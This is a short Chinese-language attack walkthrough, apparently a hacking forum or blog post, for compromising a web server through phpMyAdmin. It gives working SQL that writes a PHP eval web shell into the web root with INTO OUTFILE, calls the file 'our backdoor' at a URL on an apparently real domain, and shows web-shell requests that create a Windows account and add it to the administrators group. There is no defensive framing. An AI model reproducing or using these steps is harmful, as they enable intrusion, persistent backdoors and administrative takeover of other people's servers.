首先用暴路径漏洞找到绝对路径，然后替换下面的路径

随便选个数据库，然后执行以下的sql（利用sql命令导出一个shell）

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘D:\www\dmtz\bbs\upload\phpmyadmin\eval.php‘;
Drop TABLE IF EXISTS a;

这是我们的后门

http://chncto.com/phpmyadmin/eval.php

加个系统帐号
http://chncto.com/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://chncto.com/phpmyadmin/eval.php?cmd=net localgroup administrators test /add